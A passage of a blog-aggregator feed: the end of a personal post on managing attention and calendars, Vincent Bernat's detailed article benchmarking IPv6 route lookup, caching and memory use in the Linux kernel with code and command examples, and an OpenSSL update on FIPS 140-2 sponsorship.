    Being clear on what’s important. Being honest with myself about my own habits. Protecting how and where my attention is being pulled. Managing my own calendar.

    I know I’m going to want to work on personal stuff, surf a bit, and do some reading. Knowing that I’m a morning person, I start my day before work on something for myself. Usually it falls under reading, writing, or coding.

    After that I usually scan through my feed reader and read anything that catches my eye, surf a few regular sites and check my personal email.

    When I do start work the first thing I do is about one hour of reactive work. All of those notifications and requests needing my attention get worked on. Right now this usually looks like catching up on email, Slack, Github, and Trello.

    I then try to have a few chunks of time blocked off in my calendar throughout the week as “Focused Work”. This creates space to focus on what I need to work on while leaving time to be available for anyone else.

    The key has been managing my own calendar to allow time for my attention to be directed on the things I want, the things I need, and the needs of others.

    I do keep a running text file where I write out the important or urgent things that need to be done for the day. I’ll also add notes when something interrupts me. When I used to write this out on paper I used this sheet from Dave Seah called The Emergent Task Timer. I found it helped to write out what needs to be done each day and to track what things are pulling my attention away from more important things.

    Because the type of work that I do can be interrupt-driven, I orientate my team in a similar fashion. Creating that same uninterrupted time for everyone allows us to minimize the impact of distractions. During the week there are blocks of time where one person is the interruptible person while everyone else snoozes notifications in Slack, ignores email and gets some work done.

    This also means focusing on minimizing the impact of alert / notification fatigue. Have zero tolerance for things that page you repeatedly or add unnecessary notifications to your day.

    The key really is just those four things I listed at the beginning.

    You have to be clear in what is important both for yourself and for those you’re accountable to.

    You have to be honest with yourself about your own habits. If you keep telling yourself you’re going to do something, but you never do… well, there’s probably something else at play. Maybe you’re more in love with the idea than with actually doing it.

    You need to protect your attention from being pulled away by things that are not important or urgent.

    You can work towards those three points by managing your own calendar. Besides tracking the passage of days, a calendar schedules where your attention will be focused. If you don’t manage it, others will manage it for you.

    I view these as ideals that I try to aim for. The circumstances I’m in might not always allow me to do so, but they do give me direction on how I work each day.

    And yeah when I’m in the office I use headphones.

    August 22, 2017 07:54 AM

    August 20, 2017

    Vincent Bernat

    IPv6 route lookup on Linux

    TL;DR: With its implementation of IPv6 routing tables using radix trees, Linux offers subpar performance (450 ns for a full view — 40,000 routes) compared to IPv4 (50 ns for a full view — 500,000 routes) but fair memory usage (20 MiB for a full view).


    In a previous article, we had a look at IPv4 route lookup on Linux. Let’s see how different IPv6 is.

    Lookup trie implementation

    Looking up a prefix in a routing table comes down to finding the most specific entry matching the requested destination. A common structure for this task is the trie, a tree structure where each node’s key is prefixed by its parent’s key.

    With IPv4, Linux uses a level-compressed trie (or LPC-trie), providing good performance with low memory usage. For IPv6, Linux uses a more classic radix tree (or Patricia trie). There are three reasons for not sharing the same implementation:

    • The IPv6 implementation (introduced in Linux 2.1.8, 1996) predates the IPv4 implementation based on LPC-tries (in Linux 2.6.13, commit 19baf839ff4a).
    • The feature set is different. Notably, IPv6 supports source-specific routing1 (since Linux 2.1.120, 1998).
    • The IPv4 address space is denser than the IPv6 address space. Level-compression is therefore quite efficient with IPv4. This may not be the case with IPv6.

    The trie in the below illustration encodes 6 prefixes:

    Radix tree

    For more in-depth explanation on the different ways to encode a routing table into a trie and a better understanding of radix trees, see the explanations for IPv4.

    The following figure shows the in-memory representation of the previous radix tree. Each node corresponds to a struct fib6_node. When a node has the RTN_RTINFO flag set, it embeds a pointer to a struct rt6_info containing information about the next-hop.

    Memory representation of a routing table

    The fib6_lookup_1() function walks the radix tree in two steps:

    1. walking down the tree to locate the potential candidate, and
    2. checking the candidate and, if needed, backtracking until a match.

    Here is a slightly simplified version without source-specific routing:

    static struct fib6_node *fib6_lookup_1(struct fib6_node *root,
                                           struct in6_addr  *addr)
    {
        struct fib6_node *fn;
        __be32 dir;
    
        /* Step 1: locate potential candidate */
        fn = root;
        for (;;) {
            struct fib6_node *next;
            dir = addr_bit_set(addr, fn->fn_bit);
            next = dir ? fn->right : fn->left;
            if (next) {
                fn = next;
                continue;
            }
            break;
        }
    
        /* Step 2: check prefix and backtrack if needed */
        while (fn) {
            if (fn->fn_flags & RTN_RTINFO) {
                struct rt6key *key = &fn->leaf->rt6i_dst;
                if (ipv6_prefix_equal(&key->addr, addr, key->plen))
                    return fn;
            }
    
            if (fn->fn_flags & RTN_ROOT)
                break;
            fn = fn->parent;
        }
    
        return NULL;
    }
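To make the two-step walk concrete, here is a self-contained toy version of the same idea: a plain (uncompressed) binary trie over 8-bit "addresses", with the descend-then-backtrack lookup. This is only a model for illustration; the kernel tree is path-compressed and 128 bits wide, and all names below are invented.

```c
#include <stdint.h>
#include <stdlib.h>

/* Toy model of fib6_lookup_1(): a plain binary trie over 8-bit
 * addresses.  The kernel's tree is path-compressed and 128 bits wide;
 * all names here are invented for the illustration. */
struct tnode {
    struct tnode *child[2], *parent;
    uint8_t key, plen;   /* stored prefix, valid when has_info is set */
    int has_info;        /* plays the role of the RTN_RTINFO flag */
};

static int bit(uint8_t addr, int i) { return (addr >> (7 - i)) & 1; }

static int prefix_equal(uint8_t a, uint8_t b, int plen)
{
    uint8_t mask = plen ? (uint8_t)(0xff << (8 - plen)) : 0;
    return (a & mask) == (b & mask);
}

void trie_insert(struct tnode *root, uint8_t key, uint8_t plen)
{
    struct tnode *n = root;
    for (int i = 0; i < plen; i++) {
        int d = bit(key, i);
        if (!n->child[d]) {
            n->child[d] = calloc(1, sizeof(struct tnode));
            n->child[d]->parent = n;
        }
        n = n->child[d];
    }
    n->key = key;
    n->plen = plen;
    n->has_info = 1;
}

struct tnode *trie_lookup(struct tnode *root, uint8_t addr)
{
    struct tnode *n = root;
    int depth = 0;
    /* Step 1: walk down as far as the tree allows */
    while (depth < 8) {
        struct tnode *next = n->child[bit(addr, depth)];
        if (!next)
            break;
        n = next;
        depth++;
    }
    /* Step 2: backtrack towards the root until a stored prefix matches */
    while (n) {
        if (n->has_info && prefix_equal(n->key, addr, n->plen))
            return n;
        n = n->parent;
    }
    return NULL;
}
```

With a default route (0x00/0), 0x80/1 and 0xa0/3 inserted, looking up 0xa5 descends to the 0xa0/3 node and matches immediately, while 0x90 descends into the same subtree and then backtracks up to 0x80/1, mirroring the candidate-then-backtrack behavior of the kernel function.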
    

    Caching

    While IPv4 lost its route cache in Linux 3.6 (commit 5e9965c15ba8), IPv6 still has a caching mechanism. However, cache entries are put directly in the radix tree instead of in a distinct structure.

    Since Linux 2.1.30 (1997) and until Linux 4.2 (commit 45e4fd26683c), almost any successful route lookup inserts a cache entry in the radix tree. For example, a router forwarding a ping between 2001:db8:1::1 and 2001:db8:3::1 would get those two cache entries:

    $ ip -6 route show cache
    2001:db8:1::1 dev r2-r1  metric 0
        cache
    2001:db8:3::1 via 2001:db8:2::2 dev r2-r3  metric 0
        cache
    

    These entries are cleaned up by the ip6_dst_gc() function controlled by the following parameters:

    $ sysctl -a | grep -F net.ipv6.route
    net.ipv6.route.gc_elasticity = 9
    net.ipv6.route.gc_interval = 30
    net.ipv6.route.gc_min_interval = 0
    net.ipv6.route.gc_min_interval_ms = 500
    net.ipv6.route.gc_thresh = 1024
    net.ipv6.route.gc_timeout = 60
    net.ipv6.route.max_size = 4096
    net.ipv6.route.mtu_expires = 600
    

    The garbage collector is triggered at most every 500 ms when there are more than 1024 entries or at least every 30 seconds. The garbage collection won’t run for more than 60 seconds, except if there are more than 4096 routes. When running, it will first delete entries older than 30 seconds. If the number of cache entries is still greater than 4096, it will continue to delete more recent entries (but no more recent than 512 jiffies, i.e. 1 << gc_elasticity) after a 500 ms pause.

    Starting from Linux 4.2 (commit 45e4fd26683c), only a PMTU exception would create a cache entry. A router doesn’t have to handle those exceptions, so only hosts would get cache entries. And they should be pretty rare. Martin KaFai Lau explains:

    Out of all IPv6 RTF_CACHE routes that are created, the percentage that has a different MTU is very small. In one of our end-user facing proxy server, only 1k out of 80k RTF_CACHE routes have a smaller MTU. For our DC traffic, there is no MTU exception.

    Here is what a cache entry with a PMTU exception looks like:

    $ ip -6 route show cache
    2001:db8:1::50 via 2001:db8:1::13 dev out6  metric 0
        cache  expires 573sec mtu 1400 pref medium
    

    Performance

    We consider three distinct scenarios:

    Excerpt of an Internet full view
    In this scenario, Linux acts as an edge router attached to the default-free zone. Currently, the size of such a routing table is a little bit above 40,000 routes.
    /48 prefixes spread linearly with different densities
    Linux acts as a core router inside a datacenter. Each customer or rack gets one or several /48 networks, which need to be routed around. With a density of 1, /48 subnets are contiguous.
    /128 prefixes spread randomly in a fixed /108 subnet
    Linux acts as a leaf router for a /64 subnet with hosts getting their IP using autoconfiguration. It is assumed all hosts share the same OUI and therefore, the first 40 bits are fixed. In this scenario, neighbor reachability information for the /64 subnet is converted into routes by some external process and redistributed among other routers sharing the same subnet2.

    Route lookup performance

    With the help of a small kernel module, we can accurately benchmark3 the ip6_route_output_flags() function and correlate the results with the radix tree size:

    Maximum depth and lookup time

    Getting meaningful results is challenging due to the size of the address space. None of the scenarios have a fallback route and we only measure time for successful hits4. For the full view scenario, only the range from 2400::/16 to 2a06::/16 is scanned (it contains more than half of the routes). For the /128 scenario, the whole /108 subnet is scanned. For the /48 scenario, the range from the first /48 to the last one is scanned. For each range, 5000 addresses are picked semi-randomly. This operation is repeated until we get 5000 hits or until 1 million tests have been executed.

    The relation between the maximum depth and the lookup time is not perfect, and I can’t explain the difference in performance between the different densities of the /48 scenario.

    We can extract two important performance points:

    • With a full view, the lookup time is 450 ns. This is almost ten times the budget for forwarding at 10 Gbps — which is about 50 ns.
    • With an almost empty routing table, the lookup time is 150 ns. This is still over the time budget for forwarding at 10 Gbps.

    With IPv4, the lookup time for an almost empty table was 20 ns while the lookup time for a full view (500,000 routes) was a bit above 50 ns. How to explain such a difference? First, the maximum depth of the IPv4 LPC-trie with 500,000 routes was 6, while the maximum depth of the IPv6 radix tree for 40,000 routes is 40.

    Second, while both IPv4’s fib_lookup() and IPv6’s ip6_route_output_flags() functions have a fixed cost implied by the evaluation of routing rules, IPv4 has several optimizations when the rules are left unmodified5. Those optimizations are removed on the first modification. If we cancel those optimizations, the lookup time for IPv4 is impacted by about 30 ns. This still leaves a 100 ns difference with IPv6 to be explained.

    Let’s compare how time is spent in each lookup function. Here is a CPU flamegraph for IPv4’s fib_lookup():

    IPv4 route lookup flamegraph

    Only 50% of the time is spent in the actual route lookup. The remaining time is spent evaluating the routing rules (about 30 ns). This ratio is dependent on the number of routes we inserted (only 1000 in this example). It should be noted the fib_table_lookup() function is executed twice: once with the local routing table and once with the main routing table.

    The equivalent flamegraph for IPv6’s ip6_route_output_flags() is depicted below:

    IPv6 route lookup flamegraph

    Here is an approximate breakdown on the time spent:

    • 50% is spent in the route lookup in the main table,
    • 15% is spent in handling locking (IPv4 is using the more efficient RCU mechanism),
    • 5% is spent in the route lookup of the local table,
    • most of the remaining is spent in routing rule evaluation (about 100 ns)6.

    Why is the evaluation of routing rules less efficient with IPv6? Again, I don’t have a definitive answer.

    History

    The following graph shows the performance progression of route lookups through Linux history:

    IPv6 route lookup performance progression

    All kernels are compiled with GCC 4.9 (from Debian Jessie). This version is able to compile older kernels as well as current ones. The kernel configuration is the default one with CONFIG_SMP, CONFIG_IPV6, CONFIG_IPV6_MULTIPLE_TABLES and CONFIG_IPV6_SUBTREES options enabled. Some other unrelated options are enabled to be able to boot them in a virtual machine and run the benchmark.

    There are three notable performance changes:

    • In Linux 3.1, Eric Dumazet slightly delays the copy of route metrics to fix the undesirable sharing of route-specific metrics by all cache entries (commit 21efcfa0ff27). Each cache entry now gets its own metrics, which explains the performance hit for the non-/128 scenarios.
    • In Linux 3.9, Yoshifuji Hideaki removes the reference to the neighbor entry in struct rt6_info (commit 887c95cc1da5). This should have led to a performance increase. The small regression may be due to cache-related issues.
    • In Linux 4.2, Martin KaFai Lau prevents the creation of cache entries for most route lookups. The most significant performance improvement comes with commit 4b32b5ad31a6. The second one is from commit 45e4fd26683c, which effectively removes the creation of cache entries, except for PMTU exceptions.

    Insertion performance

    Another interesting performance-related metric is the insertion time. Linux is able to insert a full view in less than two seconds. For some reason, the insertion time is not linear above 50,000 routes and climbs very fast to 60 seconds for 500,000 routes.

    Insertion time

    Despite its more complex insertion logic, the IPv4 subsystem is able to insert 2 million routes in less than 10 seconds.

    Memory usage

    Radix tree nodes (struct fib6_node) and routing information (struct rt6_info) are allocated with the slab allocator7. It is therefore possible to extract the information from /proc/slabinfo when the kernel is booted with the slab_nomerge flag:

    # sed -ne 2p -e '/^ip6_dst/p' -e '/^fib6_nodes/p' /proc/slabinfo | cut -f1 -d:
    ♯  name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab>
    fib6_nodes         76101  76104     64   63    1
    ip6_dst_cache      40090  40090    384   10    1
    

    In the above example, the used memory is 76104×64+40090×384 bytes (about 20 MiB). The number of struct rt6_info matches the number of routes while the number of nodes is roughly twice the number of routes:
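The arithmetic is worth spelling out, since the same two columns of any slabinfo dump give the footprint directly. The helper below simply recomputes the figure from the dump above; the function name is mine.

```c
/* Recomputes the "about 20 MiB" figure from the slabinfo dump above:
 * total slab memory is num_objs * objsize summed over the two caches. */
static double route_slab_mib(unsigned long fib6_nodes, unsigned long node_size,
                             unsigned long ip6_dsts, unsigned long dst_size)
{
    return ((double)fib6_nodes * node_size + (double)ip6_dsts * dst_size)
           / (1024.0 * 1024.0);
}
/* route_slab_mib(76104, 64, 40090, 384) is about 19.3 MiB */
```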

    Nodes

    The memory usage is therefore quite predictable and reasonable, as even a small single-board computer can support several full views (20 MiB for each):

    Memory usage

    The LPC-trie used for IPv4 is more efficient: where IPv6 needs 512 MiB of memory to store 1 million routes, IPv4 needs only 128 MiB. The difference is mainly due to the size of struct rt6_info (336 bytes) compared to the size of IPv4’s struct fib_alias (48 bytes): IPv4 puts most information about next-hops in struct fib_info structures that are shared between many entries.

    Conclusion

    The takeaways from this article are:

    • upgrade to Linux 4.2 or more recent to avoid excessive caching,
    • route lookups are noticeably slower compared to IPv4 (by an order of magnitude),
    • the CONFIG_IPV6_MULTIPLE_TABLES option incurs a fixed penalty of 100 ns per lookup,
    • memory usage is fair (20 MiB for 40,000 routes).

    Compared to IPv4, IPv6 in Linux doesn’t attract the same interest, notably in terms of optimization. Hopefully, things are changing as its adoption and use “at scale” increase.


    1. For a given destination prefix, it’s possible to attach source-specific prefixes:

      ip -6 route add 2001:db8:1::/64 \
        from 2001:db8:3::/64 \
        via fe80::1 \
        dev eth0
      

      Lookup is first done on the destination address, then on the source address. 

    2. This is quite different from the classic scenario where Linux acts as a gateway for a /64 subnet. In this case, the neighbor subsystem stores the reachability information for each host and the routing table only contains a single /64 prefix. 

    3. The measurements are done in a virtual machine with one vCPU and no neighbors. The host is an Intel Core i5-4670K running at 3.7 GHz during the experiment (CPU governor set to performance). The benchmark is single-threaded. Many lookups are performed and the result reported is the median value. Timings of individual runs are computed from the TSC. 

    4. Most of the packets in the network are expected to be routed to a destination. However, this also means the backtracking code path is not used in the /128 and /48 scenarios. Having a fallback route gives far different results and makes it difficult to ensure we explore the address space correctly. 

    5. The exact same optimizations could be applied to IPv6. Nobody has done it yet. 

    6. Compiling out table support effectively removes those last 100 ns. 

    7. There are also per-CPU pointers allocated directly (4 bytes per entry per CPU on a 64-bit architecture). We ignore this detail. 

    by Vincent Bernat at August 20, 2017 04:53 PM

    August 17, 2017

    OpenSSL

    FIPS 140-2: Thanks and Farewell to SafeLogic

    We’ve had a change in the stakeholder aspect of this new FIPS 140 validation effort. The original sponsor, SafeLogic, with whom we jump-started this effort a year ago and who has worked with us since then, is taking a well-deserved bow due to a change in circumstances. Supporting this effort has been quite a strain for a relatively small company, but SafeLogic has left us in a fairly good position. Without SafeLogic we wouldn’t have made it this far, and while I don’t anticipate any future SafeLogic involvement with this effort from this point on, I remain enormously grateful to SafeLogic and CEO Ray Potter for taking on such a bold and ambitious venture.

    As announced here recently Oracle remains a sponsor but will hopefully not be the only sponsor for long. We will continue to partner with Acumen and we have been working extensively with Ashit Vora and Tony Busciglio there to sort out some new ideas.

    No code has been written yet as we’re still developing a technical strategy and design. We’ve considered some new approaches to structuring the module, perhaps even as a related set of “bound” modules instead of one monolithic module as for past validations. Carefully sorting through the implications of design decisions for FIPS 140 requirements is a tedious but necessary process, and I think we’ll make faster progress overall by not rushing to the coding stage.

    As always we’re interested in hearing from stakeholders (and especially prospective sponsors!), please contact me at marquess@openssl.com or Jim Wright at Oracle at jim.wright@oracle.com.

    August 17, 2017 04:00 PM